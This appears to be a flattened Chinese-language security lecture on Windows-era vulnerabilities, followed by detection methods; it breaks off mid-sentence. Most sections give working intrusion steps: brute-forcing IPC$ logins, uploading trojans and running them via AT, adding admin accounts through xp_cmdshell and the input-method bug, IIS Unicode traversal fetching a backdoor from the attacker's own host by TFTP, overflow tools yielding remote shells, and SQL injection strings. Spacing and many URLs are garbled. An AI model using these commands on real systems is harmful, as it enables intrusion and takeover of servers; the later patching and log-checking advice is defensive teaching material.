藍盾網絡安全講座-----藍盾安全小組系統安全漏洞與安全檢測目錄漏洞的形成漏洞的分類漏洞的檢測工具漏洞的防范辦法安全檢測的目的常見安全檢測的內容專業安全檢測的內容一、漏洞形成后門：大型軟件、系統的編寫，是許多程序員共同完成。他們是將一個軟件或系統分成若干板塊，分工編寫，然后再匯總，測試。最后，修補,發布。在軟件匯總時，為了測試方便，程序員總會留有后門；在測試以后再進行修補……這些后門，如果一旦疏忽（或是為某種目的故意留下），或是沒有發現，軟件發布后自然而然就成了漏洞。程序若干板塊之間的空隙：這里很容易出現連程序員的都沒想到的漏洞！藍盾安全小組網絡協議：網絡協議有TCP、UDP、ICMP、IGMP等。其實，他們本來的用途是好的，但卻被別人用于不乏的活動：例如，ICMP本來是用于尋找網絡相關信息，后來卻被用于網絡嗅探和攻擊；TCP本來是用于網絡傳輸，后來卻被用于泄漏用戶信息。程序員自身的素質：程序員的自身對網絡安全認識的不夠，寫出的程序自身就有漏洞。二、系統漏洞的分類

操作系統漏洞應用平臺的漏洞應用系統的漏洞網絡系統漏洞操作系統的漏洞弱口令弱口令就是用戶的操作密碼過于簡單（如‘123’）。描述：本漏洞的危害性極強，它可以對系統服務器作任何的操作。主要是因為管理員的安全意識不足。測試目的：用本漏洞控制服務器系統。（1）我們可以用爆力破解工具或掃描器（XSCAN等）對機器進行掃描，可得到管理員密碼。只要擁有管理員級權限，就能完全共享應用對方的機器，如下面的命令會將對方的C盤映射為自己的X盤：

c:\>netusex:\\[目標主機的IP地址]\c$"[密碼]"/user:"[用戶名]"

其中"c$"為系統默認共享，依此類推，同樣可以共享對方的"d$","e$（2）運行AT命令。C:\>netstartschedule

Schedule正在啟動服務.....

Schedulw服務啟動成功。

AT的語法：

AT[\\computername][time]"command"

比如：

AT[\\computername][time]runnc.bat（3）用遠程控制終端輸入法漏洞

描述：輸入法漏洞可以說是中文Windows2000推出后的第一個致命漏洞,通過它我們可以做許多的事情,包括建立用戶.測試1：使用文件類型編輯創建管理員用戶

：

1.開機到登陸界面調出輸入法,如全拼->幫助->操作指南,跳出輸入法指南幫助文件

2.右擊"選項"按鈕,選擇"跳至url"

3.在跳至URL上添上"c:\",其它的也可.

4.幫助的右邊會進入c:5.按幫助上的"選項"按鈕.

6.選"internet"選項.會啟動文件類型編輯框.

7.新建一個文件類型,如一個you文件類型,在跳出的文件后綴中添上"you".確定.

8.選中文件類型框中的"you"文件類型,點擊下面的"高級按鈕",會出現文件操作對話框.

9.新建一種文件操作,操作名任意寫,如"ppp"

10.該操作執行的命令如下:

C:\WINNT\system32\cmd.exe

/c

net

user

mayi

123456

/add

&

C:\WINNT\system32\cmd.exe

/c

net

localgroup

administrators

aboutnt

/add

完成后退出

11.將c:\的某個文件如"pipi.txt"改為"pipi.txt.mayi",然后雙擊打開這個文件.

12.通常這個文件是打不開的,系統運行一會便沒有了提示,但這時我們已經將用戶mayi加上了,權限是管理員.

13.返回,重新以aboutnt用戶登錄即可。

IPC$共享漏洞

描述：危害性大，主要是和其它漏洞一塊使用IPC$(Inter-ProcessCommunication)共享是NT計算機上的一個標準的隱含共享，它是用于服務器之間的通信的。NT計算機通過使用這個共享來和其他的計算機連接得到不同類型的信息的。常常可利用這一點來，通過使用空的IPC會話進行攻擊。測試1：通過本漏洞猜測用戶密碼c:\>netuse\\[目標機器的IP地址]\ipc$/user:<name><passwd>當這個連接建立后，要將username和password送去加以確認。如果你以"Administrator"登錄，則需要進行口令猜測。

可以重復使用'net'命令，進行username和password猜測：

c:\>netuse\\xxx.xxx.xxx.xxx\ipc$/user:<name><passwd>也可以使用腳本語句：open(IPC,"netuse\\xxx.xxx.xxx.xxx\ipc$/user:<name><passwd>");看看目標計算機上有那些共享的資源可以用下面命令：c:\>netview\\[目標計算機的IP地址]一旦IPC$共享順利完成，下一個命令是：c:\>netuseg:\\xxx.xxx.xxx.xxx\c$得到了C$共享，并將該目錄映射到g:，鍵入：c:\>dirg:/p就能顯示這個目錄的所有內容。測試2：通過測試1來上傳木馬控制服務器c:\>netuse\\\ipc$””/user:”admin”此時，cmd會提示命令成功完成。這樣你就和建立了IPC連接。c:\>copyserver.exe\\\admin$上傳server.exe到的winnt目錄，因為winnt目錄里的東西比較多，管理員不容易發現，所以我們把server.exe上傳到里面。Server.exe是janker寫的winshell生成的程序，WinShell是一個運行在Windows平臺上的Telnet服務器軟件。c:\>nettime\\這個命令可以的到的系統時間，例如是00：00c:\>at\\00:01”server.exe”cmd會提示新加了一項任務，其作業ID為1，這樣遠程系統會在00:01時運行server.exe。c:\>at\\1這樣可以查看ID為1的作業情況。c:\>netuse\\\ipc$/delete退出IPC連接。現在，server.exe已經在遠程主機上運行了。輸入：c:\>telnet21（端口可以自己在winshell中設定）這樣就成功的telnet到上了。應用平臺的漏洞

SQLSERVER存在的一些安全漏洞：“SA”帳號弱口令描述：危害性極強，它可以完作控制系統服務器。存在“sa”帳戶，密碼就為空，或密碼過于簡單，我們就可以通過掃描工具（如X-SCAN等）得到密碼，用測試：通過XP-CMDSHEll來增加一個帳號如：Xp_cmdshell"netusertestuser/ADD

"然后在：Xp_cmdshell"netlocalgroupAdministratorstestuser/ADD

"

這樣攻擊者就成功的在SQLSERVER上增加了一個用戶。當然遠程的話，一般需要有1433口開著，通過MSSQL客戶端進行連接。最后你可以用添加的用戶名通過遠程控制終端來控制你服務器系統。擴展存儲過程參數解析漏洞：描述：危害性極強，它可以完作控制系統服務器。起主要問題是在MSD中提供一個API函數srv_paraminfo(),它是用來擴展存儲過程調用時解釋深入參數的，如:exec<存儲過程名><參數1>,<參數2>,...如要查詢“c:\winnt”的目錄樹，可以如下表達：execxp_dirtree'c:\winnt'但沒有檢查各個參數的長度，傳遞相當長的字符串，就存在了覆蓋其他堆棧參數的可能導致緩沖溢出。目前已知受影響的擴展存儲過程如下：xp_printstatements(xprepl.dll)xp_proxiedmetadata(xprepl.dll)xp_SetSQLSecurity(xpstar.dll)…關于openrowset和opendatasource

描述：危害性極強，它可以完作控制系統服務器。利用openrowset發送本地命令

,通常我們的用法是（包括MSDN的列子）如下

select

*

from

openrowset(''sqloledb'',''myserver'';''sa'';'''',''select

*

from

table'')

可見（即使從字面意義上看)openrowset只是作為一個快捷的遠程數據庫訪問，它必須跟在select后面，也就是說需要返回一個recordset

那么我們能不能利用它調用xp_cmdshell呢？答案是肯定的！

select

*

from

openrowset(''sqloledb'',''server'';''sa'';'''',''set

fmtonly

off

exec

master.dbo.xp_cmdshell

''''dir

c:\'''''')

必須加上set

fmtonly

off用來屏蔽默認的只返回列信息的設置，這樣xp_cmdshell返回的output集合就會提交給前面的select顯示，如果采用

默認設置，會返回空集合導致select出錯，命令也就無法執行了。

那么如果我們要調用sp_addlogin呢，他不會像xp_cmdshell返回任何集合的，我們就不能再依靠fmtonly設置了，可以如下操作

select

*

from

openrowset(''sqloledb'',''server'';''sa'';'''',''select

''''OK!''''

exec

master.dbo.sp_addlogin

Hectic'')

這樣，命令至少會返回select

''OK!''的集合，你的機器商會顯示OK!，同時對方的數據庫內也會增加一個Hectic的賬號，也就是說，我們利用

select

''OK!''的返回集合欺騙了本地的select請求，是命令能夠正常執行，通理sp_addsrvrolemember和opendatasource也可以如此操作！

IIS漏洞

IISunicode漏洞

描述:危害性極強，可以完全的控制服務器。對于IIS5.0/4.0中文版，當IIS收到的URL請求的文件名中包含一個特殊的編碼例如“%c1%hh”或者“%c0%hh”,它會首先將其解碼變成:0xc10xhh，然后嘗試打開這個文件，Windows系統認為0xc10xhh可能是unicode編碼，因此它會首先將其解碼，如果0x00<=%hh<0x40的話，采用的解碼的格式與下面的格式類似：%c1%hh->(0xc1-0xc0)*0x40+0xhh%c0%hh->(0xc0-0xc0)*0x40+0xhh例如，在Windows2000簡體中文版+IIS5.0+SP1系統下測試：IIS會報告說"@.ida"文件找不到這里:（0xc1-0xc0)*0x40+0x00=0x40='@'IIS會報告說"A.ida"文件找不到這里:（0xc1-0xc0)*0x40+0x01=0x41='A'攻擊者可以利用這個漏洞來繞過IIS的路徑檢查，去執行或者打開任意的文件。測試1：下面的URL可能列出當前目錄的內容：測試2：利用這個漏洞查看系統文件內容也是可能的：測試3：刪除空的文件夾命令：

:\snowspider

測試4：刪除文件的命令:

:\autoexec.bak

測試5：Copy文件

:\winnt\repair\sam._%20c:\inetpub\\

測試5：用木馬（用TFTP、NCX99）在地址欄里填入：

-i???.???.???.???GETncx99.exec:\\inetpub\\scripts\\sr.exe???.???.???.???為你自己的IP，

注意：c:\\inetpub\\scripts\\sr.exe其中c:\\inetpub\\scripts\\為主機服務器目錄，要看主機的具體情況而定，sr.exe為被改名的ncx99.exe（自己選名字吧）。然后等待...大概3分鐘...IE瀏覽器左下角顯示完成，紅色漏斗消失，這時ncx99.exe已經上傳到主機c:\inetpub\scripts\目錄了，您可以自己檢查一下。再使用如下調用來執行ncx99.exe(sr.exe):\inetpub\scripts\sr.exe然后您就可以telnet99

printer遠程緩存溢出漏洞緩存溢出:緩存溢出又稱為緩沖溢出，緩沖區指一個程序的記憶范圍(領域)，該領域是用來儲存一些數據，如電腦程序信息，中間計算結果，或者輸入參數。把數據調入緩沖區之前，程序應該驗證緩沖區有足夠的長度以容納所有這些調入的數據。否則，數據將溢出緩沖區并覆寫在鄰近的數據上，當它運行時，就如同改寫了程序。假如溢出的數據是隨意的，那它就不是有效的程序代碼，當它試圖執行這些隨意數據時，程序就會失敗。另一方面，假如數據是有效的程序代碼，程序將會按照數據提供者所設定的要求執行代碼和新的功能。描述：漏洞的活動范圍是：這是一個緩存溢出漏洞，這漏洞比以往的普通溢出存在更大的危害，主要有兩方面的原因：*在缺省安全的情況下，該漏洞可以被來自網絡的利用。*可以完全獲得和控制存在該漏洞的網站服務器。一旦溢出成功，他可以做他想做的一些事情，包括：安裝和運行程序，重新配置服務，增加、改變或者刪除文件和網頁的內容等等。漏洞的起因是：WIN2K在網絡打印ISAPI擴展上缺少足夠的緩沖區檢查，當一個發出特殊的請求服務時產生緩存溢出，可以讓在本地系統執行任意代碼。測試：通過IIS5HACK工具來檢用信息iis5hacksomeip803iis5remote.printeroverflow.writenbysunxfortestonly,dontusedtohack,:pconnecting...sending...Nowyoucantelnetto99portgoodluck:)c:\telnet699MicrosoftWindows2000[Version5.00.2195](C)Copyright1985-2000MicrosoftCorp.C:\WINNT\system32>已經進入目標主機，你想干什么就是你的事啦。

IISIndexServer(.ida/idq)ISAPI擴展遠程溢出漏洞描述：危害性極強，它可以完作控制系統服務器。微軟IIS缺省安裝情況下帶了一個索引服務器(IndexServer,在Windows2000下名為"IndexService").缺省安裝時，IIS支持兩種腳本映射：管理腳本(.ida文件)、Inernet數據查詢腳本(.idq文件)。這兩種腳本都由一個ISAPI擴展-idq.dll來處理和解釋。由于idq.dll在處理某些URL請求時存在一個未經檢查的緩沖區，如果攻擊者提供一個特殊格式的URL,就可能引發一個緩沖區溢出。通過精心構造發送數據，攻擊者可以改變程序執行流程，執行任意代碼。成功地利用這個漏洞,攻擊者可以遠程獲取"LocalSystem"權限。測試:來控制服務器。運行IDQGUI程序，出現一個窗口，填好要入侵的主機IP，選取所對應的系統SP補丁欄，其他設置不改，取默認。然后按右下角的IDQ益出鍵。

如果成功如圖如果不成功會提示連接錯誤。連接成功后，我們打開WIN下的DOS狀態，輸入：NC-VVX.X.X.X813

如果成功如圖不成功的話可以在IDQGUI程序里換另一個SP補丁欄試試，如果都不行，就放棄。換其他漏洞機器。4、應用系統漏洞編程語言漏洞

MDB數據庫可下載漏洞描述：危害性強，可以得到網站的所有內容。數據庫中一般存放的是客戶的帳號、密碼以及網站的中所有內容，如果得到了數據庫，也就可以說得到了網站的一功，原理，WEB服務器遇到不能解釋的文件是就給下載，測試：在地址欄輸入http://someurl/path/name.mdb，你會發現name.mdb的數據庫給下載下來。

SQL語句漏洞描述：危害性強，可以進入網站的后臺應用程序。假設沒有過濾必要的字符：

select

*

from

login

where

user='$HTTP_POST_VARS[user]'

and

pass='$HTTP_POST_VARS[pass]'

我們就可以在用戶框和密碼框輸入1'

or

1='1通過驗證了。這是非常古董的方法了，這個語句會替換成這樣：

select

*

from

login

where

user='1'

or

1='1'

and

pass='1'

or

1='1'

因為or

1='1'成立，所以通過了。解決的辦法最好就是過濾所有不必要的字符，

Jsp代碼泄漏漏洞描述：危害性強，有可能可以查看到數據庫帳號密碼。

在訪問JSP頁面時，如果在請求URL的.jsp后綴后面加上一或多個‘.‘、‘%2E’、‘+’、‘%2B’、‘\’、‘%5C’、‘%20’、‘%00’

，會泄露JSP源代碼。測試:查看網頁源代碼

服務器會正常解釋。

.只要在后面加上一個.就會導致源代碼泄漏(可以通過瀏覽器的查看源代碼看到)。

原因：

由于Windows在處理文件名時，將"index.jsp"和"index.jsp."認為是同一個文件。

CGI漏洞

x.htworqfullhit.htworiirturnh.htw

描述：危害性強，IIS4.0上有一個應用程序映射htw--->webhits.dll，這是用于IndexServer的點擊功能的。盡管你不運行IndexServer，該映射仍然有效。這個應用程序映射存在漏洞，允許入侵者讀取本地硬盤上的文件，數據庫文件，和ASP源代碼。一個攻擊者可以使用如下的方法來訪問系統中文件的內容：

http://?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full就會在有此漏洞系統中win.ini文件的內容。webhits.dll后接上"../"便可以訪問到Web虛擬目錄外的文件,下面我們來看個例子:

在瀏覽器中輸入該地址,便可以獲得該服務器上給定日期的Web日志文件.在系統常見的.htw樣本文件有:/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/iissamples/exair/search/qfullhit.htw

/iissamples/exair/search/qsumrhit.hw

/iishelp/iis/misc/iirturnh.htw[這個文件通常受loopback限制]

利用inetinfo.exe來調用webhits.dll,這樣同樣能訪問到Web虛擬目錄外的文件,這樣請求一個.htw文件:

/ex000121.log&CiRestriction=none&CiHiliteType=Full

這個請求肯定會失敗，但請注意,我們現在已經調用到了webhits.dll,我們只要在一個存在的文件資源后面[也就是在.htw前面]加上一串特殊的數字(%20s),[就是在例子中default.htm后面加上這個代表空格的特殊數字],這樣我們便可以欺騙過web服務器從而達到我們的目的.由于在緩沖部分中.htw文件名字部分被刪除掉[由于%20s這個符號],所以,當請求傳送到webhits.dll的時候,便可以成功的打開該文件,并返回給客戶端,而且過程中并不要求系統中真的存在.htw文件。比如：

/ex000121.log&CiRestriction=none&CiHiliteType=Full解決方法：hit-highligting功能是由IndexServer提供的允許一個WEB用戶在文檔上highlighted（突出）他們原始搜索的條目，這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件，Webhits.dll是一個ISAPI應用程序來處理請求，打開文件并返回結果，當用戶控制了CiWebhitsfile參數傳遞給.htw時，他們就可以請求任意文件，結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞，你可以請求如下條目：

如果你從服務器端獲得如下信息：

formatoftheQUERY_STRINGisinvalid

這就表示你存在這個漏洞。

這個問題主要就是webhits.dll關聯了.htw文件的映射，所以你只要取消這個映射就能避免這個漏洞，你可以在你認為有漏洞的系統中搜索.htw文件，一般會發現如下的程序：

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw(這個一般為loopback使用)

msadc

描述：IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDSDatafactory，默認情況下，它允許遠程命令發送到IIS服務器中，這命令會以設備用戶的身份運行，其一般默認情況下是SYSTEM用戶。測試：結合木馬來控制服務器C:\Perl\BIN>perl-xmsadc2.pl-h目標機xxx.xxx.xxx.xxx

PleasetypetheNTcommandlineyouwanttorun(cmd/cassumed):\ncmd/c一般這里我用TFTP上傳我的木馬文件，但首先你得先設置好你的TFTP主機tgetntsrv.exec:\winnt\system32\ntsrv.exe這里

是我的TFTP主機，TFTP目錄下有NTSRV。EXE木馬如果程序執行成功，TFTP會顯示文件傳輸的進度，然后再執行PERL，將木馬激活，你再用木馬連上對方的機器，搞定2、C:\Perl\BIN>perl-xmsadc2.pl-h目標機cmd/cnetuserpt007/add3、C:\Perl\BIN>perl-xmsadc2.pl-h目標機cmd/cnetuserpt007ptlove4、C:\Perl\BIN>perl-xmsadc2.pl-h目標機cmd/cnetlocalgroupadministratorspt007/add5、C:\Perl\BIN>perl-xmsadc2.pl-h目標機cmd/cc:\winnt\system32>ncx99.exe

uploader.exe

描述：本漏洞的危害性強，如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用uploader.exe上傳任何文件。

測試：上傳一個木馬在地址欄輸入：

會帶你到上傳頁面三、漏洞檢測工具商業ISSBD-SCANNERN-STEALTHPROMISCAN自由HFNETCHKX-SCAN流光四、漏洞的解決辦法打補丁

打對應的補丁是最好的解決辦法，可以到微軟下載中心下載所需的補丁。另注意以后要不斷下載升級補丁。

用IISLOCKTOOLS

防火墻五、安全檢測目地對系統漏洞的發現確定是否被入侵過1、日志的檢測（1）日志的分類操作系統安全日志應用程序日志系統日志應用系統其它HTTP狀態代碼說明

200代碼表明了所有的工作一切正常，傳輸過程很成功

201代碼表明成功發出并執行了一POST命令

202代碼表明客戶的命令由服務器接受以進行處理

204代碼表明客戶的請求得到處理，服務器不能返回數據

300代碼表明客戶請求的數據最近被移走

301代碼表明服務器發現客戶所請求的數據位于一個替代的臨時重定向的URL302代碼表明服務器建議客戶到一個替代的位置去請求數據303代碼表明出現了一個問題，服務器不能修改請求數據400代碼表明客戶發出了一個異常的請求，因此不能被處理401代碼表明客戶試圖訪問一個未被授權的訪問的數理403代碼表明訪問被禁止404代碼表明文檔未找到500表明一個服務器不能恢復的內部服務器錯誤502代碼表明服務器過載目地：發現CGI漏洞入侵者，以及WEB服務的情況安全性日志安全性基本上捕獲那些成功和失敗審核事件，同時對這種事性的概述很簡單。如下圖WIN2000系統日志IIS日志路徑：c:\winnt\system32\logFTP日志路徑：c:\winnt\system32\log2、端口掃描作用：發現木馬和確定開通的服務。工具：SUPERSCAN、PORTSCAN、3、網絡的監視作用：發現網絡攻擊工具：TCPDUMP（LINUX）、WINDUMP（WINDOWS）、命今NETSTAT4、檢查用戶帳號和組信息

啟動"用戶管理器"程序，或者在命令行狀態下執行"netuser"、"netgroup"和"netlocalgroup"命令，查看當前用戶和組清單，確保內置GUEST帳號被禁止使用：看看是否有非法組成員存在。默認安裝后的組都具有特殊權限，例如，Administrators組成員有權對本地系統做任何事情，Backupoperators組成員有權讀取系統中的所有文件，PowerUsers組成員有權創建共享。不要讓一些不合適的用戶隱藏在這些組中。

5、定時任務中是否存在可疑程序檢查定時任務中是否存在可疑程序。攻擊者可以讓后門程序定時運行，以便將來重新入侵。更進一步地，要準確核對定時任務所對應的實際程序名是否合法。在命令行狀態下執行“at”命令可以很方便地看到這些信息。6、臨時進程檢查是否存在臨時進程。要獲取這些信息，可以借助任務管理器、也可以在命令行執行pulist.exe和tlist.exe。pulist可以查看每個進程由誰啟動，tlist-f可以查看哪個進程又啟動了子進程。7、檢測混雜模式的網卡作用：確認是否被監聽。軟件：PROMISCAN嗅探行為已經成為網絡安全的一個巨大威脅。通過網絡嗅探，一些惡意用戶能夠很容易地竊取到絕密的文檔和任何人的隱私。要實現上述目的非常容易，惡意用戶只要從網絡上下載嗅探器并安全到自己的計算機就可以了。然而，卻沒有一個很好的方法來檢測網絡上的嗅探器程序,以下將討論使用地址解析協議(AddressResolutionProtocol)報文來有效地檢測網絡上的嗅探器程序。原理和檢測方法:例如：網絡上一臺IP地址為的PC(X)以太網地址是00-00-00-00-00-01，這臺PC(X)需要向網絡上另外一臺IP地址為0的PC(Y)發送消息。在發送之前，X首先發出一個ARP請求包查詢0對應的以太網地址。查詢包的目的地址被設置為FF-FF-FF-FF-FF-FF(廣播)，從而本地網絡上的所有節點都可以收到這個包。收到之后，每個節點會檢查這個ARP包查詢的IP地址和本機的IP地址是否匹配。如果不同，就忽略這個ARP包；如果匹配(Y)就向X發出應答。X收到應答之后就緩存Y的IP/硬件地址。然后，X就可以向Y發送實際的數據。如果我們把這個